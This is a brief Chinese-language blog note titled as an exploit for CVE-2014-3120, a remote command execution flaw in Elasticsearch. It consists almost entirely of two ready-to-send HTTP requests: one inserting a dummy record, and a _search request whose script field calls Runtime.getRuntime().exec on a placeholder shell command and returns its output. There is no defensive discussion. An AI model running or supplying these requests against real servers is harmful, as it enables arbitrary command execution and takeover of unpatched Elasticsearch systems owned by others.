【笔记】CVE-2014-3120漏洞利用

发表于 更新于 阅读次数:

前言

Elasticsearch的RCE远程命令执行漏洞

exp

  1. 新增数据

随便新增一条数据,确保数据库中有数据即可

request
1
2
3
4
5
6
POST http://127.0.0.1:9200/x
Content-Type: application/json

{
  "key": "value"
}
  1. 远程命令执行

<shell>:远程执行的Shell命令

request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST http://127.0.0.1:9200/_search?pretty
Content-Type: application/json

{
  "size": "1",
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "search_fields": {
    "command": {
      "script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"<shell>\").getInputStream()).useDelimiter(\"\\\\A\").next();"
    }
  }
}

完成

参考文献

哔哩哔哩——xiaodisec